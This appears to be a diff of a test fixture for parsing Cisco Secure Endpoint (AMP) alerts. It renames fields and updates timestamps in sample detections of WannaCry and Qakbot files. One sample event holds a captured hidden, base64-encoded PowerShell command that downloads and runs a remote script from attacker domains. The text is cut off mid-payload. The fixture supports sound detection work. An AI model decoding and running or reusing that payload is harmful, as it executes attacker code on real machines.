                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":765000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
@@ -1663,7 +1663,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1734,7 +1734,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111177282Z",
+                "ingested": "2021-09-27T00:41:58.139856307Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":749000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1745,7 +1745,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -1817,7 +1817,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111179351Z",
+                "ingested": "2021-09-27T00:41:58.139858048Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":702000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1828,7 +1828,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -1890,7 +1890,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111181571Z",
+                "ingested": "2021-09-27T00:41:58.139859886Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336648\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -1900,7 +1900,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1965,7 +1965,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111183666Z",
+                "ingested": "2021-09-27T00:41:58.139861680Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -1975,7 +1975,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2040,7 +2040,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111185734Z",
+                "ingested": "2021-09-27T00:41:58.139863424Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":713000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -2050,7 +2050,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2121,7 +2121,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111187851Z",
+                "ingested": "2021-09-27T00:41:58.139865171Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2132,7 +2132,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.D177E09A9A-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2200,7 +2200,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111189928Z",
+                "ingested": "2021-09-27T00:41:58.139866913Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2211,7 +2211,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.D177E09A9A-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2283,7 +2283,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111192015Z",
+                "ingested": "2021-09-27T00:41:58.139868667Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336645\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"120C.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\120C.tmp\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2294,7 +2294,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.D177E09A9A-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2366,7 +2366,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111194086Z",
+                "ingested": "2021-09-27T00:41:58.139870423Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336644\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"92673dd0e5f4a094fa6cd57bb301f884f2289f6c\",\"md5\":\"2f99e3456dc1d26f77c52b2119fde92f\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2377,7 +2377,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.D177E09A9A-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2429,16 +2429,25 @@
                 "name": "Demo_BP_WMIPRVSE",
                 "hostname": "Demo_BP_WMIPRVSE"
             },
+            "threat": {
+                "tactic": {
+                    "id": [
+                        "TA0002",
+                        "TA0005",
+                        "TA0008"
+                    ]
+                }
+            },
             "event": {
                 "severity": 2,
                 "action": "Threat Detection",
-                "ingested": "2021-09-13T18:07:28.111196171Z",
+                "ingested": "2021-09-27T00:41:58.139872187Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880683125978957000,\"timestamp\":1610640884,\"timestamp_nanoseconds\":810000000,\"date\":\"2021-01-14T16:14:44+00:00\",\"event_type\":\"Threat Detection\",\"event_type_id\":553648222,\"detection\":\"WMIPRVSE Launched Encoded Powershell Command\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"bp_data\":{\"audit\":false,\"details\":{\"actions\":[{\"action\":\"end_process\",\"end_ts\":1602033881808,\"params\":[\"10724\"],\"start_ts\":1602033881805,\"status\":\"success\"}],\"eng_epoch\":1,\"eng_ver\":\"0.9.0.104\",\"matched_activity\":{\"events\":[{\"process:start\":{\"app\":\"powershell.exe\",\"app_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"args\":[\"powershell.exe\",\"-NoP\",\"-NonI\",\"-W\",\"Hidden\",\"-E\",\"JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgB